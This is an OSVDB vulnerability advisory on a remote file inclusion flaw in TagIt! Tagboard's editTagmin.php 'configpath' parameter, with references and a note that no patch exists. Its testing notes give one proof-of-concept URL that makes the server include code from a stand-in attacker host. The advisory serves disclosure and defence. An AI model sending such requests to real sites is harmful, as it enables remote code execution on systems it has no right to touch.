TagIt! Tagboard (tagit2b) tagmin/editTagmin.php configpath Variable Remote File Inclusion

2007-02-11T23:41:25
ID OSVDB:34610
Type osvdb
Reporter M.Hasran Addahroni(eufrato@gmail.com)
Modified 2007-02-11T23:41:25

Description

Vulnerability Description

TagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/editTagmin.php script not properly sanitizing user input supplied to the 'configpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

TagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/editTagmin.php script not properly sanitizing user input supplied to the 'configpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[TagIt_path]/tagmin/editTagmin.php?configpath=http://[attacker]/evil?

References:

Vendor URL: http://www.deadlysin3.net/tagit2b/ Other Advisory URL: http://echo.or.id/adv/adv65-K-159-2007.txt ISS X-Force ID: 32436 FrSIRT Advisory: ADV-2007-0557 CVE-2007-0900 Bugtraq ID: 22518